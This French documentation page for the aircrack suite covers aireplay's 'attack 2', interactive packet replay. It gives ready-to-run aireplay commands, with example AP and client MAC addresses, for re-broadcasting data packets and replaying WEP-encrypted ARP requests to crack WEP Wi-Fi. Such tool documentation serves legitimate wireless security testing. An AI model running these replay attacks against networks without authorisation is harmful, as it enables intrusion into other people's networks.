Documentation de aircrack
retour a l'index de la doc
Attaque 2: interactive packet replay
Reinjection selective de paquets
Cette attaque vous autorise à choisir un paquet particulier pour etre répété; cela produit parfois de meilleurs resultats que l'attaque 3 (injection automatique d'ARP).
Vous pouvez par exemple l'utiliser pour tenter l'attaque "any data re-broadcast", qui ne fonctionne actuellement que si l'Ap réencrypte les paquets de données:
@ MAC de l'AP (canal 6):00:13:10:30:24:9C @ MAc du client wifi: 00:09:5B:EB:C5:2B
aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
Vous pouvez aussi utilisez l'attaque 2 pour renvoyer manuellement des requetes ARP cryptées en WEP, dont la taille et soit 68 soit 86 bytes (suivant le système d'expoitation):
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
|